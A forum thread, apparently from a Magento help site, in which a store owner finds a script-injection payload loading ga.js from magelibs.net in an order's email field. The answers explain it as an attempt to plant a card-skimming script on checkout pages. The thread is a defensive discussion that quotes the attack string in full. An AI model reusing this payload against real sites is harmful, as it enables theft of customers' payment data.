# Strange email address in order detail page in Admin panel

Tags: magento-enterprise, magento-1

In Magento 1.x admin panel (order detail page) instead customer email, there is a code:

```
mailto:"id = ee><script src=https://magelibs.net/ga.js></script>"@gmail.com
```

Payer Email in Payment Information section is the same.

Has anybody the same strange issue, and maybe know how to prevent it?

Comment: Have detected the same issue on other magento store today

Answer (score 1):

I guess someone is testing your website for vulnerabilities.
Someone is checking if your the values that come from inputs are sanitized.
The fact that you see the `<script>` tag in the page is a good thing. It means that you are safe.
Don't worry about it.
But if you want to be paranoid, you can ban the ip address for that specific order.

Answer (score 1):

To make a long story short - you're lucky. It was an attempt to hack your site.

They tried to have the ga.js script running in your browser.

When they succeed, they 'deface' your site, by adding a script tag in the footer of pages, which runs on each display of the page, when your customers are viewing it. (i.e. in your customer's browser!)

When the page is a checkout page, it will grab whatever field are available on the page, and send them as a JSON to a domain owned by the operator.

**In other words, they are not after YOU, they are after the CREDIT CARDS of your customers.**

Luckily, your version contained a patch that caused the script not to run.